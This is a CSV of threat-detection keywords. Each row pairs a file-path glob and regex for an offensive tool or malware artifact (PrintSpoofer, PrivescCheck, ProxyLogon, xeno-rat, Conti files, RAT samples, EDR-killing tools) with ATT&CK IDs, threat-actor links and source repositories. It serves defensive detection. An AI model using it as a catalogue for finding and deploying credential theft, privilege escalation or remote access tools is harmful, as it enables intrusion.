"*\PrintCreds.py*",".{0,1000}\\PrintCreds\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","17452"
"*\printerbug.py*",".{0,1000}\\printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17453"
"*\printernightmare.ps1*",".{0,1000}\\printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","17454"
"*\PrintNightmare.*",".{0,1000}\\PrintNightmare\..{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","17456"
"*\printnightmare.py*",".{0,1000}\\printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17457"
"*\PrintSpoofer.cs*",".{0,1000}\\PrintSpoofer\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17458"
"*\PrintSpoofer.csproj*",".{0,1000}\\PrintSpoofer\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","17459"
"*\PrintSpoofer.dll*",".{0,1000}\\PrintSpoofer\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17460"
"*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17461"
"*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","17462"
"*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17463"
"*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17464"
"*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17465"
"*\PrintSpoofer-1.0.zip*",".{0,1000}\\PrintSpoofer\-1\.0\.zip.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","17466"
"*\PrivEditor.dll*",".{0,1000}\\PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17467"
"*\PrivEditor\*",".{0,1000}\\PrivEditor\\.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17468"
"*\privesc.ps1*",".{0,1000}\\privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","17469"
"*\PrivEsc.txt*",".{0,1000}\\PrivEsc\.txt.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","17470"
"*\PrivescCheck*",".{0,1000}\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","17471"
"*\PrivescCheck.ps1*",".{0,1000}\\PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17472"
"*\PrivescCheck_*",".{0,1000}\\PrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","17473"
"*\PrivescCheck_*",".{0,1000}\\PrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","17474"
"*\Privesc-master*",".{0,1000}\\Privesc\-master.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","17475"
"*\privexchange.py*",".{0,1000}\\privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17476"
"*\PrivFu.txt*",".{0,1000}\\PrivFu\.txt.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17477"
"*\privilege escalation.cna*",".{0,1000}\\privilege\sescalation\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17478"
"*\PrivKit\*",".{0,1000}\\PrivKit\\.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","17479"
"*\procdump.py*",".{0,1000}\\procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17481"
"*\process_killer.cpp*",".{0,1000}\\process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","17484"
"*\ProcessDLLHijack.cs*",".{0,1000}\\ProcessDLLHijack\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","17485"
"*\processinjection.exe*",".{0,1000}\\processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17486"
"*\ProcessSpoofing.h*",".{0,1000}\\ProcessSpoofing\.h.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","17487"
"*\ProcProtectClient.exe*",".{0,1000}\\ProcProtectClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","17488"
"*\Program Files (x86)\KidLogger*",".{0,1000}\\Program\sFiles\s\(x86\)\\KidLogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17501"
"*\Program Files\Bad Windows Service*",".{0,1000}\\Program\sFiles\\Bad\sWindows\sService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","17514"
"*\Program Files\nps\*",".{0,1000}\\Program\sFiles\\nps\\.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","17529"
"*\Program Rat V1.0 By Black Sinper.exe*",".{0,1000}\\Program\sRat\sV1\.0\sBy\sBlack\sSinper\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17540"
"*\ProgramData\asrephashes.txt*",".{0,1000}\\ProgramData\\asrephashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","17547"
"*\ProgramData\found_shares.txt*",".{0,1000}\\ProgramData\\found_shares\.txt.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17550"
"*\ProgramData\shares.txt*",".{0,1000}\\ProgramData\\shares\.txt.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17558"
"*\Programs\StartUp\XenoUpdateManager*",".{0,1000}\\Programs\\StartUp\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","17566"
"*\prometheus.txt*",".{0,1000}\\prometheus\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17568"
"*\ProSpy_RAT_*.exe*",".{0,1000}\\ProSpy_RAT_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17569"
"*\ProtectMyTooling.cna*",".{0,1000}\\ProtectMyTooling\.cna.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17570"
"*\ProtectMyTooling.py*",".{0,1000}\\ProtectMyTooling\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17571"
"*\ProtectMyTooling.yaml*",".{0,1000}\\ProtectMyTooling\.yaml.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17572"
"*\ProtectMyToolingGUI.py*",".{0,1000}\\ProtectMyToolingGUI\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17573"
"*\ProtonRAT.exe*",".{0,1000}\\ProtonRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17574"
"*\proxylistener.py*",".{0,1000}\\proxylistener\.py.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17584"
"*\proxylogon.py*",".{0,1000}\\proxylogon\.py.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","17585"
"*\proxyTunnel.ps1*",".{0,1000}\\proxyTunnel\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","17586"
"*\ps_encoder.py*",".{0,1000}\\ps_encoder\.py.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17587"
"*\ps_proxy.ps1*",".{0,1000}\\ps_proxy\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17588"
"*\ps_stager.ps1*",".{0,1000}\\ps_stager\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17589"
"*\PS1ToBase64.ps1*",".{0,1000}\\PS1ToBase64\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17590"
"*\Ps1ToVbs.ps1*",".{0,1000}\\Ps1ToVbs\.ps1.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","17591"
"*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","17592"
"*\PS2EXE.ps1*",".{0,1000}\\PS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","17593"
